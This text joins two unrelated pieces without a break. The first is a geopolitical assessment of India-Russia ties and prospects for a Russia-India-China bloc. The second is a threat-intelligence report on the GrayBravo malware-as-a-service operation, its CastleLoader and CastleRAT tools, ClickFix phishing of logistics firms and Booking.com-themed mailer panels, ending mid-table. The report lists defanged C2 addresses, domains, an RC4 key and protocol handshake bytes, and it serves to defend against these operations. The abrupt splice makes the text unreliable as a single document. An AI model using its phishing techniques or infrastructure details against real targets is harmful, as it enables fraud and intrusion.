India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to support India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has called Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to reform global power dynamics and is not anti-West, in contrast to Russia’s goal of ushering in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has articulated that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, Why Bharat Matters, asserts that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”
India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its declared neutral, non-aligned strategy. India abstained on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently calls for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly maintained a warm friendship despite US and European criticism of Russia, and Modi has referred to Russia as India’s “all-weather friend and trusted ally.”
Economic Dynamics
Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has stated that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia has been India’s top supplier of crude oil, and Russian oil exceeded 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and enabled it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports remained steady in the first half of September 2025. The US subsequently imposed sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to pause new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude turned around in the Baltic Sea — an incident that oil analysts attributed to the US sanctions pressure. However, Indian Oil continued to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.
Total trade between India and Russia amounted to $68.7 billion in FY2025, likely surging as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi aims to achieve $100 billion in trade with Russia by 2030. Both countries seek to reduce reliance on the US dollar, and 90% of trade is now settled in ruble-rupee transactions. However, India’s trade with the West will likely complicate financial integration; India has been hesitant to adopt sanctions-resistant payment networks with Russia and has dismissed the idea of replacing the US dollar.
Military Dynamics
We assess that India and Russia’s military relationship is centered on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has purchased roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases include Russia’s S-400 missile defense system, which India used in May 2025 to repel Pakistani missile attacks. India and Russia have also pursued joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has stagnated on other fronts, such as joint training and exercises.
Although Moscow continues to be India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has sought to reduce its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US signed a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.
The documented poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” revealed internal documents from Russia’s state-owned defense conglomerate Rostec detailing how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.
State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation
China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.
Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.
RIC Format: Dormant, Though Russia and China Are Interested in Reviving It
The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.
Between 2002 and 2020, twenty trilateral ministerial-level meetings occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers meeting in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.
In a 2022 joint statement, China and Russia declared their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov reiterated in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely indicating India’s reserved openness to it.
BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement
The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization committed to perpetuating a multipolar world via political, security, and economic cooperation.
Though Russia and China have sought to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India views the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.
Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are based on foundational treaties. The New Development Bank (NDB) supports collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.
We assess that BRICS could also facilitate Russia and China’s efforts to develop alternatives to the US dollar, though India’s hesitation to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have explored the development of a common currency and have specifically created a cross-border digital payment and messaging system backed by cryptocurrency, called BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “identifying possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”
Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests
Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO Summit in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to focus on border security and ethnic minority separatism in China’s Xinjiang region, though it has since expanded to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India joined in 2017, after being an observer since 2005, with Russia’s support and possibly without China’s, as Beijing sponsored Pakistan’s membership that same year.
China and Russia have used the SCO to advance their geopolitical aims, including shaping future multipolarism and projecting power. In particular, China uses the SCO as a foundation for expanding an international security architecture that is consistent with the CCP’s regime security.
We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently aligned. For example, India initially did not participate in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later joined a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped facilitate bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly objected to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is using the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.
Indicators of Deeper Trilateral Cooperation
The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.
Note: The analysis cut-off date for this report was November 10, 2025
Executive Summary
Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.
For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.
To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).
Key Findings
Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.
One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.
Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.
Background
In September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.
Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.
Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.
Figure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)
Threat Analysis
Higher Tier Infrastructure
Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.
Figure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)
CastleRAT
CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.
Infrastructure Analysis
Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in Figure 3, Insikt Group observed two CastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, 104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.
Figure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)
Notably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00, and the server responds with trailing bytes 9e ff 74 70 before closing the connection. A similar exchange occurs with 5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00 00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.
Clustering by RC4 Key
Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see Figure 4). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.
Figure 4:RC4 key clusters (Source: Recorded Future)
CastleLoader
Infrastructure Analysis
Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in Appendix A. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.
Notably, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.
Activity Clusters
Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 4). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.
Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.
Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160
Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed exploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight & Analytics and Loadlink Technologies for multiple purposes.
Attack Flow
Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5 illustrates a high-level overview of the phishing attack flow.
Figure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)
The attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example, englandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.
The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt Group has observed multiple variations of these landing pages.
Figure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)
Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, loadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.
Figure 7: “dpeforms” page found in Google Search (Source: Recorded Future)
After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see Figure 8). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.
Figure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)
By following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using pythonw.exe, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.
Figure 9: ClickFix command (Source: Recorded Future)
Use of Compromised Infrastructure
As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.
Infrastructure Analysis
Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of these domains include the subdomain apps[.]englandlogistics (for example, apps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, loadstrucking[.]com, instead featured the subdomain app[.]england, following a similar naming pattern.
Insikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between July 6 and September 26, 2025, which was serving the file newtag.zip (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.
Domain Re-Registration Tactic
Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. Figure 10 provides two examples of this activity.
Figure 10: Re-registration of logistics-themed domains (Source: Recorded Future)
Notably, the domain cdlfreightlogistics[.]com appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain hometownlogisticsllc[.]com hosted a website for Hometown Logistics LLC in 2021 (see Figure 11).
Figure 11: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)
Public Complaints and Suspected Access to DAT and Loadlink
Some of the domains listed in the Infrastructure Analysis section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address david[@]cdlfreightlogistics[.]com, associated with the domain cdlfreightlogistics[.]com, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see Figure 12). Several respondents indicated they did not believe it to be legitimate.
Figure 12:Example phishing email sent by TAG-160 (Source: Recorded Future)
While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.
In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight & Analytics (dat.com) and Loadlink Technologies (loadlink.ca), both platforms operating in the freight matching industry (see Figure 13). The fraudulent registrations used fake company information, including the email address paul[@]mrlogsol[.]ca, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.
Figure 13: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)
Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, maritza[.]rmlogisticsol[@]gmail[.]com (see Figure 14).
Figure 14: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)
Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see Figure 13) and further supported by additional profiles identified by Insikt Group (see Figure 15). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains dat[.]com and loadlink[.]ca observed in Recorded Future Identity Intelligence.
Figure 15: Account information linked to TAG-160 (Source: Recorded Future)
Access to platforms like DAT Freight & Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.
Possible Overlap with September 2024 Campaign
In September 2024, Proofpoint reported on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight & Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.
While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight & Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).
Notably, in November 2025, Proofpoint reported again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.
Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161
Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader and other payloads, including Matanbuchus. Notably, Insikt Group observed this cluster using Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified a previously unreported phishing email management tooling, which appears to be used by threat actors linked to Cluster 2.
Matanbuchus Activity and Booking.com-Themed Infrastructure
Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, 185[.]39[.]19[.]164 (see Figure 16).
Figure 16: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)
Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. BelialDemon offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the HTTPS-based version and $15,000 per month for the DNS-based version.
Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing communicated with its C2 server at mechiraz[.]com, a domain behind Cloudflare but linked to the IP address 5[.]178[.]1[.]8 (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain nicewk[.]com, previously reported by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including galaxioflow[.]com and nimbusvaults[.]com.
Additional Booking.com-Themed Infrastructure
By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in Appendix D, are tracked by Insikt Group as part of Cluster 2.
Phishing Email Management Tooling
By analyzing the IP addresses hosting the domains listed in Appendix D, Insikt Group identified three that stood out for each hosting three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email”, “Менеджер Редиректов и рассылок”, and “Менеджер Редиректов и Email” (translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.
Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)
The first website, hosted on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see Figure 17). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.
Figure 17: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)
Within the document object model (DOM) of the website, Insikt Group identified two email addresses, with one of them being likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.
Additionally, the DOM referenced a set of domains, some of which are listed in Appendix D, while others were newly identified and are listed in Appendix E. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in Appendix E.
Website 2: Email Manager (“Менеджер Email”)
The second website, hosted on port 56724, closely resembles the first “Redirect and Mailing Manager” panel but exhibits several notable configuration differences (see Figure 18). These include a distinct AWS username, an SMTP sender address, bred[@]booking-porta[.]com, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified 109[.]104[.]153[.]87 as its proxy server.
Figure 18: Page linked to “Email Manager” tool (Source: Recorded Future)
Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)
The third website, hosted on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see Figure 19). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: [identifier].[base_name].[main_domain].
Figure 19: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)
The domains site-riko[.]com, site-sero[.]com, site-silo[.]com, site-tiko[.]com, and site-filo[.]com are all referenced within the DOM.
Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in Table 1.
IP Address
Ports
109[.]104[.]153[.]100
11599, 12305, 13267, 13275
109[.]104[.]153[.]193
10324, 10616, 14195, 14196
109[.]104[.]153[.]29
13413, 14900
109[.]104[.]154[.]67
11264, 11860, 14100, 14122
Table 1: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)
Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in Table 2. The domains hosted on these IP addresses are listed in Appendix H.
IP Address
ASN
Notes
85[.]208[.]84[.]65
STIMUL-AS, RU (AS211659)
Certificate subject common name: guesitastayhotel[.]com
CastleRAT and Matanbuchus C2 servers identified within the same /24 range (85[.]208[.]84[.]115 and 85[.]208[.]84[.]242, respectively)
80[.]64[.]18[.]245
STIMUL-AS, RU (AS211659)
Hosts hotel-themed domains
185[.]39[.]19[.]94
OPTIMA-AS, RU (AS216341)
Certificate subject common name: guesitastayhotel[.]com
88[.]214[.]50[.]83
OPTIMA-AS, RU (AS216341)
